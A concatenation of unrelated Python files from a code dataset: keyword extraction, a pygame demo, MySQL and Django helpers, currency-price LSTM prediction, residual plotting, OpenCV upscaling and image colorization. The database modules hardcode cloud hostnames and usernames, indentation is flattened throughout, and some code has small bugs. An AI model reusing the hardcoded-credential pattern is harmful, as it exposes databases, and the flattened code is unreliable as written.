new_words = ["using", "show", "result", "large", "also", "iv", "one", "two", "new", "previously", "shown", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten" "us", "u.s."]
stop_words = stop_words.union(new_words)
corpus = []
## PREPROCESS DATA
text = re.sub(r'http\S+', '', dataset) #Remove URLs
text = re.sub('[^a-zA-Z]', ' ', text) #Remove punctuations
text = text.lower() #Convert to lowercase
text=re.sub("</?.*?>"," <> ",text) #remove tags
text=re.sub("(\\d|\\W)+"," ",text) # remove special characters and digits
text = text.split() #Convert to list from string
lem = WordNetLemmatizer() #Lemmatisation
text = [lem.lemmatize(word) for word in text if not word in stop_words]
text = " ".join(text)
corpus.append(text)
corpus.append('the') #countVectorizer needed an array so I append a dummy word
############################
###### NEW PROCESSING ######
############################
# import pandas as pd
# import nltk
# import re
# import contractions
# from nltk.corpus import stopwords
# from nltk.tokenize import RegexpTokenizer
# from nltk.stem import WordNetLemmatizer
# from nltk.stem.porter import PorterStemmer
# lemmatizer = WordNetLemmatizer()
# cachedStopWords = stopwords.words('english')
# cachedStopWords = set(stopwords.words("english"))
# new_words = ["using", "show", "result", "large", "also", "iv", "one", "two", "new", "previously", "shown", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "us", "u.s."]
# cachedStopWords = cachedStopWords.union(new_words)
# tokenizer = RegexpTokenizer(r'\w+')
# def remove_html(text):
# return re.sub(r'http\S+', '', text)
# def filter_word(word):
# word = re.sub(r'[-–—]', " ", word)
# return re.sub(r'[^a-zA-Z\s]+', "", word)
# def filter_words(text):
# return ' '.join([filter_word(w) for w in text.split()])
# def remove_contractions(text): # contractions has trouble with large data sets
# return ' '.join([contractions.fix(word) for word in text.split()])
# # improved parsing time!! went from 13s per 100rows to <1s
# def rmStopAndLemmatize(arr):
# return ' '.join([lemmatizer.lemmatize(w) for w in arr if (w not in cachedStopWords and w in words)])
# text = remove_html(dataset.lower())
# text = remove_contractions(text)
# text = filter_words(text)
# text = tokenizer.tokenize(text)
# text = rmStopAndLemmatize(text)
# corpus = []
# corpus.append(text)
# corpus.append('the') #countVectorizer needed an array so I append a dummy word
## TEXT VECTORIZER
from sklearn.feature_extraction.text import CountVectorizer
import re
cv=CountVectorizer(max_df=0.8,stop_words=stop_words, max_features=10000, ngram_range=(1,3))
X=cv.fit_transform(corpus)
## CONVERT TEXT TO INT MATRIX
from sklearn.feature_extraction.text import TfidfTransformer
tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)
tfidf_transformer.fit(X)
# get feature names
feature_names=cv.get_feature_names()
# fetch document for which keywords needs to be extracted
doc=corpus[0]
#generate tf-idf for the given document
tf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))
#Function for sorting tf_idf in descending order
from scipy.sparse import coo_matrix
def sort_coo(coo_matrix):
tuples = zip(coo_matrix.col, coo_matrix.data)
return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)
def extract_topn_from_vector(feature_names, sorted_items, topn=10):
"""get the feature names and tf-idf score of top n items"""
#use only topn items from vector
sorted_items = sorted_items[:topn]
score_vals = []
feature_vals = []
# word index and corresponding tf-idf score
for idx, score in sorted_items:
#keep track of feature name and its corresponding score
score_vals.append(round(score, 3))
feature_vals.append(feature_names[idx])
#create a tuples of feature,score
#results = zip(feature_vals,score_vals)
results= {}
for idx in range(len(feature_vals)):
results[feature_vals[idx]]=score_vals[idx]
return results
#sort the tf-idf vectors by descending order of scores
sorted_items=sort_coo(tf_idf_vector.tocoo())
#extract only the top n; n here is 10
keywords=extract_topn_from_vector(feature_names,sorted_items, 10)
import json
export = {
"text": doc,
"keywords": list(keywords.keys())
}
app_json = json.dumps(export)
print(app_json)
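# Invocation sketch (the argument shown is an assumption): the script expects the
# article text as its first command-line argument, e.g.
#   python KeywordExtraction.py "full text of the article to analyse ..."
# and prints a JSON object with the cleaned text and its top-10 keywords.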
``` |
{
"source": "2011zizak22/pong",
"score": 3
} |
#### File: 2011zizak22/pong/simple_game.py
```python
import sys
import pygame as pg
class Enemy(pg.sprite.Sprite):
def __init__(self, centerpoint, *groups):
super(Enemy, self).__init__(*groups)
self.rect = pg.Rect(0, 0, 64, 64)
self.rect.center = centerpoint
self.pos = self.rect.center
self.image = pg.Surface(self.rect.size)
self.image.fill(pg.Color("dodgerblue"))
self.speed = .1
def move(self, dt):
self.pos = self.pos[0] + (self.speed * dt), self.pos[1]
self.rect.center = self.pos
def update(self, dt):
self.move(dt)
def draw(self, surface):
surface.blit(self.image, self.rect)
class Game(object):
def __init__(self):
self.done = False
self.screen = pg.display.set_mode((1280, 720))
self.screen_rect =self.screen.get_rect()
self.fps = 60
self.clock = pg.time.Clock()
self.spawn_timer = 0
self.spawn_frequency = 3000 #milliseconds
self.enemies = pg.sprite.Group()
def event_loop(self):
for event in pg.event.get():
if event.type == pg.QUIT:
self.done = True
def update(self, dt):
self.spawn_timer += dt
if self.spawn_timer >= self.spawn_frequency:
print("SPAWN")
self.spawn_timer -= self.spawn_frequency
Enemy(self.screen_rect.center, self.enemies)
self.enemies.update(dt)
def draw(self):
self.screen.fill(pg.Color("gray10"))
self.enemies.draw(self.screen)
def run(self):
while not self.done:
dt = self.clock.tick(self.fps)
self.event_loop()
self.update(dt)
self.draw()
pg.display.update()
if __name__ == "__main__":
game = Game()
game.run()
pg.quit()
sys.exit()
``` |
{
"source": "201213580/midescuentogt",
"score": 3
} |
#### File: midescuentogt/servidor/conexiones.py
```python
import MySQLdb
def consultaRecuperar(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
    #cnx.close() is not called here because it raises an exception.
return cursor
def consultaSQL(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
respuesta=cursor.fetchone()
if respuesta=='1':
respuesta=True
cnx.close()
return respuesta
def consultaId(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
respuesta=cursor.fetchone()
#cnx.close()
return respuesta
def consultaPromociones(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
        #cnx.close() is not called here because it raises an exception.
except Exception, e:
print ' '
return cursor
def registroSQL(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
cnx.commit()
cnx.close()
respuesta=True
except Exception, e:
        print 'The operation could not be completed'
return respuesta
def consultaCodigo(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
cnx.commit()
respuesta=cursor.fetchone()
        #cnx.close() is not called here because it raises an exception.
except Exception, e:
print ' '
return respuesta
``` |
{
"source": "2012-cevp/Proyecto-de-pre-grado-Udec",
"score": 3
} |
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/conexion_bd.py
```python
from mysql import *
from mysql.connector import pooling
import sys
class Conexion:
_DATABASE = 'bqifo1pz07m1cxqswphy'
_USERNAME = 'uqqvf5c2n9ccrnrv'
_PASSWORD = '<PASSWORD>'
_DB_PORT = '21374'
_HOST = 'bqifo1pz07m1cxqswphy-mysql.services.clever-cloud.com'
_MAX_CON = 5
_pool = None
@classmethod
def obtenerPool(cls):
if cls._pool is None:
try:
                # The error used to be here: a '.' was missing
cls._pool = pooling.MySQLConnectionPool(pool_name='mypool',
pool_size=cls._MAX_CON,
host=cls._HOST,
user=cls._USERNAME,
password=<PASSWORD>,
port=cls._DB_PORT,
database=cls._DATABASE)
                #log.debug(f'Pool created successfully: {cls._pool}')
return cls._pool
except Exception as e:
                #log.error(f'A problem occurred while getting the connection pool: {e}')
sys.exit()
else:
return cls._pool
@classmethod
def obtenerConexion(cls):
conexion = cls.obtenerPool().get_connection()
        #log.debug(f'Connection established successfully: {conexion}')
return conexion
@classmethod
def liberarConexion(cls, conexion):
conexion.close()
        #log.debug(f'Connection released successfully: {conexion}')
@classmethod
def cerrarConexion(cls):
cls.obtenerPool().closeall()
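# Usage sketch (illustrative, not part of this module):
# conexion = Conexion.obtenerConexion()
# ... run queries through conexion.cursor() ...
# Conexion.liberarConexion(conexion)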
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/conexion_insertar.py
```python
from cursor_pool import CursorDelPool
class Transacciones():
_INSERTAR_BTC = f'INSERT INTO bitcoin (`Fecha`, `Precio`, `Prediccion`,`Prediccion_sig`) VALUES (%s, %s, %s, %s)'
_INSERTAR_USD = 'INSERT INTO dolar (`Fecha`, `Precio`, `Prediccion`, `Prediccion_sig`) VALUES (%s, %s, %s, %s)'
_INSERTAR_EUR = 'INSERT INTO euro (`Fecha`, `Precio`, `Prediccion`, `Prediccion_sig`) VALUES (%s, %s, %s, %s)'
#_SELECT_BTC = f'SELECT * FROM moneda.bitcoin ORDER BY idbitcoin LIMIT 2'
_SELECT_BTC = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d %H:%i:%S"), Precio, Prediccion, Prediccion_sig FROM bitcoin ORDER BY idbitcoin DESC LIMIT 4'
_SELECT_USD = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d"), Precio, Prediccion, Prediccion_sig FROM dolar ORDER BY iddolar DESC LIMIT 5'
_SELECT_EUR = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d"), Precio, Prediccion, Prediccion_sig FROM euro ORDER BY ideuro DESC LIMIT 4'
@classmethod
def insertar_btc(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_BTC, valores)
return cursor.rowcount
@classmethod
def insertar_usd(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_USD, valores)
return cursor.rowcount
@classmethod
def insertar_eur(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_EUR, valores)
return cursor.rowcount
@classmethod
def seleccionar_btc(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_BTC)
registros = cursor.fetchall()
precios = []
fechas = []
prediccion_bitcoin = []
prediccion_siguiente_btc = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
prediccion_sig_btc = registro[3]
precios.append(precio)
fechas.append(fecha)
prediccion_bitcoin.append(prediccion)
prediccion_siguiente_btc.append(prediccion_sig_btc)
return list(reversed(precios)), list(reversed(fechas)), list(reversed(prediccion_bitcoin)), list(reversed(prediccion_siguiente_btc))
@classmethod
def seleccionar_usd(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_USD)
registros = cursor.fetchall()
precios_dolar = []
fechas_dolar = []
prediccion_dolar = []
prediccion_siguiente_dolar = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
prediccion_sig_usd = registro[3]
precios_dolar.append(precio)
fechas_dolar.append(fecha)
prediccion_dolar.append(prediccion)
prediccion_siguiente_dolar.append(prediccion_sig_usd)
return list(reversed(precios_dolar)), list(reversed(fechas_dolar)), list(reversed(prediccion_dolar)), list(reversed(prediccion_siguiente_dolar))
@classmethod
def seleccionar_eur(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_EUR)
registros = cursor.fetchall()
precios_euro = []
fechas_euro = []
prediccion_euro = []
prediccion_siguiente_euro = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
pred_sig_eur = registro[3]
precios_euro.append(precio)
fechas_euro.append(fecha)
prediccion_euro.append(prediccion)
prediccion_siguiente_euro.append(pred_sig_eur)
return list(reversed(precios_euro)), list(reversed(fechas_euro)), list(reversed(prediccion_euro)), list(reversed(prediccion_siguiente_euro))
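# Usage sketch (values are assumptions; mirrors the calls in insertar_datos_menu.py):
# Transacciones.insertar_btc('2021-01-01 12:00:00', 34000.0, 33950.0, 34100.0)
# precios, fechas, predicciones, predicciones_sig = Transacciones.seleccionar_btc()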
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/insertar_datos_menu.py
```python
import time
import threading
import datetime
from monedas import Monedas_Peticiones
from conexion_insertar import Transacciones
from modelos import modeloBitcoin, modeloEuro, modeloDolar
import numpy as np
# Load the scaler and the Bitcoin model through the modeloBitcoin() helper
escalador_btc, modelo_btc = modeloBitcoin()
escalador_euro, modelo_euro = modeloEuro()
escalador_dolar, modelo_dolar = modeloDolar()
def hora(segundos):
while True:
        # Define the timestamp used when inserting the data
        #hora = datetime.datetime.now()
        # the formats for the Dollar and the Euro are [year - month - day]
        # and for Bitcoin the format is [year-month-day hour:minute:second]
hora_dol_eur = datetime.datetime.now().strftime('%Y-%m-%d')
hora_btc = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
return hora_dol_eur, hora_btc
time.sleep(segundos)
def demora_btc(segundos):
while True:
        # Web-scrape the current Bitcoin price
        btc = Monedas_Peticiones.precio_btc()
        # Fetch the stored values; several elements are returned, so keep only the first element of the return value
        valores = Transacciones.seleccionar_btc()[0]
        # Reshape the list of values
valores = np.reshape(valores, (-1, 1))
valores = escalador_btc.fit_transform(valores)
valores = valores.reshape(1, len(valores), 1)
prediccion = modelo_btc.predict(valores)
prediccion_desescalada = escalador_btc.inverse_transform(prediccion)
prediccion_btc = round(float(prediccion_desescalada), 2)
        # Prediction for the next hour
val_siguiente = Transacciones.seleccionar_btc()[0]
val_siguiente.append(btc)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1, 1))
valor_escalado = escalador_btc.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_btc.predict(valor_escalado)
prediccion_desescalada_sig = escalador_btc.inverse_transform(
prediccion_sig)
prediccion_def_sig = round(int(prediccion_desescalada_sig), 2)
        # Insert the data; the timestamp comes from hora(), and since no pause is wanted here the
        # parameter None is passed; index [1] of the return value is used because it is the Bitcoin timestamp (hora_btc)
insertando_btc = Transacciones.insertar_btc(
hora(None)[1], btc, prediccion_btc, prediccion_def_sig)
time.sleep(segundos)
def demora_usd(segundos):
while True:
usd = Monedas_Peticiones.precio_dolar()
valores_usd = Transacciones.seleccionar_usd()[0]
valores_usd = np.reshape(valores_usd, (-1,1))
valores_usd = escalador_dolar.fit_transform(valores_usd)
valores_usd = valores_usd.reshape(1, len(valores_usd),1)
        # USD prediction
prediccion_usd = modelo_dolar.predict(valores_usd)
prediccion_desescalada_usd = escalador_dolar.inverse_transform(prediccion_usd)
prediccion_usd = round(float(prediccion_desescalada_usd), 2)
        # Prediction for the next day
val_siguiente = Transacciones.seleccionar_usd()[0]
val_siguiente.append(usd)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1,1))
valor_escalado = escalador_dolar.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_dolar.predict(valor_escalado)
prediccion_desescalada_sig = escalador_dolar.inverse_transform(prediccion_sig)
prediccion_def_sig = round(float(prediccion_desescalada_sig), 2)
insertando_dolar = Transacciones.insertar_usd(hora(None)[0], usd, prediccion_usd, prediccion_def_sig)
time.sleep(segundos)
def demora_eur(segundos):
while True:
eur = Monedas_Peticiones.precio_euro()
valores_eur = Transacciones.seleccionar_eur()[0]
        # Reshape the list of values
valores_eur = np.reshape(valores_eur, (-1, 1))
valores_eur = escalador_euro.fit_transform(valores_eur)
valores_eur = valores_eur.reshape(1, len(valores_eur), 1)
        # EUR prediction
prediccion_eur = modelo_euro.predict(valores_eur)
prediccion_desescalada_eur = escalador_euro.inverse_transform(prediccion_eur)
prediccion_eur = round(float(prediccion_desescalada_eur), 2)
        # Prediction for the next day
val_siguiente = Transacciones.seleccionar_eur()[0]
val_siguiente.append(eur)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1, 1))
valor_escalado = escalador_euro.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_euro.predict(valor_escalado)
prediccion_desescalada_sig = escalador_euro.inverse_transform( prediccion_sig)
prediccion_def_sig = round(float(prediccion_desescalada_sig), 2)
insertando_eur = Transacciones.insertar_eur(hora(None)[0], eur, prediccion_eur, prediccion_def_sig)
time.sleep(segundos)
# Here we create the threads.
# The first argument is the name of the function that contains the code.
# The second argument is a tuple of arguments for that function; the trailing comma is important because a sequence of arguments is expected (it must always stay like this).
hilo_hora = threading.Thread(target=hora, args=(3600,))
hilo_btc = threading.Thread(target=demora_btc, args=(3600,))
hilo_usd = threading.Thread(target=demora_usd, args=(86400,))
hilo_eur = threading.Thread(target=demora_eur, args=(86450,))
# Start the threads we want to run
hilo_hora.start()
hilo_btc.start()
hilo_usd.start()
hilo_eur.start()
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/modelos.py
```python
import pickle
from keras.models import load_model
import numpy as np
from conexion_insertar import Transacciones
def load_object(filename):
    with open(filename, 'rb') as f:
loaded = pickle.load(f)
return loaded
def modeloBitcoin():
loaded_scaler = load_object('Escalador_bitcoin.pkl')
modelo_btc = load_model('Modelo Bitcoin LSTM.h5')
return loaded_scaler, modelo_btc
def modeloEuro():
load_scaler_eur = load_object('Escalador_euro.pkl')
modelo_eur = load_model('Modelo_euro.h5')
return load_scaler_eur, modelo_eur
def modeloDolar():
load_scaler_dol = load_object('Escalador_dolar.pkl')
modelo_dol = load_model('Modelo_dolar.h5')
return load_scaler_dol, modelo_dol
'''
if __name__ == '__main__':
escalador, modelo = modeloDolar()
valores = Transacciones.seleccionar_usd()[0]
print(valores)
usd = 4050
valores.append(usd)
valores = valores[1:]
print(valores)
valores = np.reshape(valores, (-1,1))
valor_escalado = escalador.fit_transform(valores)
valor_escalado = valor_escalado.reshape(1, len(valores), 1)
print(valor_escalado)
prediccion = modelo.predict(valor_escalado)
prediccion_desescalada = escalador.inverse_transform(prediccion)
prediccion_def = round(int(prediccion_desescalada),2)
print(f'El valor predecido es: {prediccion_def}, tipo de dato: {type(prediccion_def)}')
'''
``` |
{
"source": "2013fangwentao/python_learning",
"score": 4
} |
#### File: python_learning/base/dog.py
```python
class Dog():
def __init__(self, name, age):
self.name = name
self.age = age
def p_name(self):
return self.name
def p_age(self):
print(self.age)
my_dog = Dog('haha', 2)
print(my_dog.name)
print(my_dog.p_name())
my_dog.p_age()
```
#### File: python_learning/base/greeter.py
```python
import pizza
def greet_user(first_name, second_name):
name = {'first name': first_name, 'second name': second_name}
return name
pizza.make_pizza(12, 'haha', 'heheh')
name = greet_user('fang', 'wentao')
print(name)
```
#### File: python_learning/numpy/numpy_io.py
```python
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
POS_INDEX = 5
VEL_INDEX = 8
ATT_INDEX = 11
TIME_INDEX = 2
def plot_residual(time, pos, vel, att, is_save, save_path):
plt.figure(1)
plt.subplot(3, 1, 1)
plt.plot(time, pos[..., 0])
plt.ylabel("x(m)")
plt.subplot(3, 1, 2)
plt.plot(time, pos[..., 1])
plt.ylabel("y(m)")
plt.subplot(3, 1, 3)
plt.plot(time, pos[..., 2])
plt.ylabel("z(m)")
plt.title("pos residual (m)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "pos_residual.jpg"))
plt.figure(2)
plt.subplot(3, 1, 1)
plt.plot(time, vel[..., 0])
plt.ylabel("x(m/s)")
plt.subplot(3, 1, 2)
plt.plot(time, vel[..., 1])
plt.ylabel("y(m/s)")
plt.subplot(3, 1, 3)
plt.plot(time, vel[..., 2])
plt.ylabel("z(m/s)")
plt.title("vel residual (m/s)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "vel_residual.jpg"))
    plt.figure(3)
    plt.subplot(3, 1, 1)
    plt.plot(time, att[..., 0])
    plt.ylabel("x(deg)")
    plt.subplot(3, 1, 2)
    plt.plot(time, att[..., 1])
    plt.ylabel("y(deg)")
    plt.subplot(3, 1, 3)
    plt.plot(time, att[..., 2])
    plt.ylabel("z(deg)")
    plt.title("att residual (deg)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "att_residual.jpg"))
plt.show()
def compare(result_file,
truth_file,
start_time=0,
end_time=86400,
is_save_picture=False,
save_path="./"):
result_data = np.loadtxt(result_file)
truth_data = np.loadtxt(truth_file)
    data_index = (result_data[..., TIME_INDEX] > start_time) & (
        result_data[..., TIME_INDEX] < end_time)
    refer_index = (truth_data[..., TIME_INDEX] > start_time) & (
        truth_data[..., TIME_INDEX] < end_time)
data_time = result_data[data_index, TIME_INDEX]
pos_data = result_data[data_index, POS_INDEX:POS_INDEX + 3]
vel_data = result_data[data_index, VEL_INDEX:VEL_INDEX + 3]
att_data = result_data[data_index, ATT_INDEX:ATT_INDEX + 3]
ref_time = truth_data[refer_index, TIME_INDEX]
ref_pos_data = truth_data[refer_index, POS_INDEX:POS_INDEX + 3]
ref_vel_data = truth_data[refer_index, VEL_INDEX:VEL_INDEX + 3]
ref_att_data = truth_data[refer_index, ATT_INDEX:ATT_INDEX + 3]
ref_i = 0
data_i = 0
residual_i = 0
    residual_pos = np.full(pos_data.shape, np.nan)
    residual_vel = np.full(vel_data.shape, np.nan)
    residual_att = np.full(att_data.shape, np.nan)
    residual_time = np.full(ref_time.shape, np.nan)
while (data_i < np.size(data_time) and ref_i < np.size(ref_time)):
if (np.abs(ref_time[ref_i] - data_time[data_i]) < 5.5e-2):
residual_pos[residual_i, ...] = ref_pos_data[
ref_i, ...] - pos_data[data_i, ...]
residual_vel[residual_i, ...] = ref_vel_data[
ref_i, ...] - vel_data[data_i, ...]
residual_att[residual_i, ...] = ref_att_data[
ref_i, ...] - att_data[data_i, ...]
residual_time[residual_i] = ref_time[ref_i]
            # angle differences need special handling (wrap yaw back into [-180, 180])
if ((residual_att[residual_i, 2]) > 180):
residual_att[residual_i, 2] -= 360
if ((residual_att[residual_i, 2]) < -180):
residual_att[residual_i, 2] += 360
ref_i += 1
data_i += 1
residual_i += 1
elif (ref_time[ref_i] - data_time[data_i] > 0):
data_i += 1
else:
ref_i += 1
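    # Worked example of the matching loop above: samples count as time-aligned when
    # |t_ref - t_data| < 5.5e-2 s, otherwise the cursor with the earlier timestamp advances.
    # E.g. ref times (1.00, 2.00) and data times (1.02, 1.50, 2.01) pair up as
    # (1.00, 1.02) and (2.00, 2.01), and the unmatched 1.50 epoch is skipped.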
    residual_pos = residual_pos[:residual_i, ...]
    residual_vel = residual_vel[:residual_i, ...]
    residual_att = residual_att[:residual_i, ...]
    residual_time = residual_time[:residual_i]
pos_mean = np.zeros([3, 3])
vel_mean = np.zeros([3, 3])
att_mean = np.zeros([3, 3])
pos_mean[0, ...] = np.mean(residual_pos)
vel_mean[0, ...] = np.mean(residual_vel)
att_mean[0, ...] = np.mean(residual_att)
pos_mean[1, ...] = np.std(residual_pos)
vel_mean[1, ...] = np.std(residual_vel)
att_mean[1, ...] = np.std(residual_att)
pos_mean[2, ...] = np.sqrt(pos_mean[0, ...] * pos_mean[0, ...] +
pos_mean[1, ...] * pos_mean[1, ...])
vel_mean[2, ...] = np.sqrt(vel_mean[0, ...] * vel_mean[0, ...] +
vel_mean[1, ...] * vel_mean[1, ...])
att_mean[2, ...] = np.sqrt(att_mean[0, ...] * att_mean[0, ...] +
att_mean[1, ...] * att_mean[1, ...])
plot_residual(residual_time, residual_pos, residual_vel, residual_att,
is_save_picture, save_path)
def main():
print("length of argv is %d" % len(sys.argv))
if (len(sys.argv) < 3):
        print("not enough arguments")
return
if (len(sys.argv) == 3):
compare(sys.argv[1], sys.argv[2])
if (len(sys.argv) == 5):
compare(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]))
if (len(sys.argv) == 7):
compare(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]),
bool(int(sys.argv[5])), sys.argv[6])
if __name__ == "__main__":
main()
``` |
{
"source": "2013ryanleung/Upscaling",
"score": 2
} |
#### File: 2013ryanleung/Upscaling/photo_bulk.py
```python
import os
import cv2
from cv2 import dnn_superres
import matplotlib.pyplot as plt
import numpy as np
import time
def display_img(img,cmap=None):
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.imshow(cv2.cvtColor(img,cv2.COLOR_BGR2RGB),cmap)
plt.show()
return
def upscale_img(img,model,x=2):
if model == "edsr":
path = "models/EDSR_x"+str(x)+".pb"
elif model == "espcn":
path = "models/ESPCN_x"+str(x)+".pb"
elif model == "fsrcnn":
path = "models/FSRCNN_x"+str(x)+".pb"
elif model == "lapsrn":
path = "models/LapSRN_x"+str(x)+".pb"
sr = dnn_superres.DnnSuperResImpl_create()
sr.readModel(path)
sr.setModel(model,x)
return sr.upsample(img)
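# Note on the helper above: upscale_img(image, "edsr", 4) expects the pretrained file
# "models/EDSR_x4.pb" to exist locally (and likewise for the other model/scale pairs);
# the model files themselves are not part of this script.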
scale = 4
show = True
names = []
direc = os.fsencode("photo_in")
for file in os.listdir(direc):
names.append(os.fsdecode(file))
t0 = time.time()
errlist = []
for i in range(0,len(names)):
path = names[i]
image = cv2.imread("photo_in/"+path)
x,y,c = image.shape
if x*scale > 6000 or y*scale > 6000:
errlist.append((i,names[i]))
continue
upscaled = upscale_img(image,"edsr",scale)
cv2.imwrite("photo_out/"+path[:-4]+"_up.png",upscaled)
    if show:
plt.figure(figsize=(12,8))
plt.subplot(1,2,1)
plt.imshow(image[:,:,::-1])
plt.subplot(1,2,2)
plt.imshow(upscaled[:,:,::-1])
plt.show()
t1 = time.time()
    print("\nElapsed time:",np.round(t1-t0,4),"s | ",i+1-len(errlist),"out of",len(names)-len(errlist))
if len(errlist) != 0:
print("\nThe photos below are too large:")
for i in errlist:
print(i)
``` |
{
"source": "201419/PersonalCodeRepository",
"score": 3
} |
#### File: optim/sparsifiedSGD/utils.py
```python
import glob
import os
import pickle
def to_percent(x):
return round(100 * x, 2)
def pickle_it(var, name, directory):
with open(os.path.join(directory, "{}.pickle".format(name)), 'wb') as f:
pickle.dump(var, f)
def unpickle_dir(d):
data = {}
assert os.path.exists(d), "{} does not exists".format(d)
for file in glob.glob(os.path.join(d, '*.pickle')):
name = os.path.basename(file)[:-len('.pickle')]
with open(file, 'rb') as f:
var = pickle.load(f)
data[name] = var
return data
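# Illustrative usage sketch (the paths and values below are hypothetical, not part of this module):
# pickle_it({'loss': [0.5, 0.3]}, 'metrics', 'results/run1')
# data = unpickle_dir('results/run1')
# data['metrics']  # -> {'loss': [0.5, 0.3]}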
``` |
{
"source": "2014mchidamb/cs3240-f16-team18",
"score": 2
} |
#### File: cs3240-f16-team18/profile/forms.py
```python
from django import forms
from django.contrib.auth.models import User
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Group, Profile
class UserForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = User
fields = ['first_name', 'last_name', 'email']
class ProfileForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ProfileForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = Profile
fields = ['birth_date', 'location', 'bio', 'priv']
class GroupForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(GroupForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = Group
fields = ['name', 'desc', 'priv']
class AddUserForm(forms.Form):
username = forms.CharField(
label = "Enter Username",
max_length = 50,
required = False,
)
def __init__(self, *args, **kwargs):
super(AddUserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class DelUserForm(forms.Form):
user_to_del = forms.CharField(
label = "Enter Username",
max_length = 50,
required = False,
)
def __init__(self, *args, **kwargs):
super(DelUserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
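# Illustrative view-side usage (hypothetical request handling, not part of this module):
# form = ProfileForm(request.POST or None, instance=profile)
# if form.is_valid():
#     form.save()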
``` |
{
"source": "2014mchidamb/DeepColorization",
"score": 3
} |
#### File: 2014mchidamb/DeepColorization/deep_colorization.py
```python
from keras.layers import Convolution2D, UpSampling2D
from keras.layers import Activation, Dense, Dropout, Flatten
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray
from skimage.io import imsave
import numpy as np
import os
import random
import tensorflow as tf
tf.python.control_flow_ops = tf
# Image transformer
datagen = ImageDataGenerator(
rescale=1.0/255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
# Get images
X = []
for filename in os.listdir('face_images'):
X.append(img_to_array(load_img('face_images/'+filename)))
X = np.array(X)
# Set up train and test data
split = int(0.9*len(X))
Xtrain = X[:split]
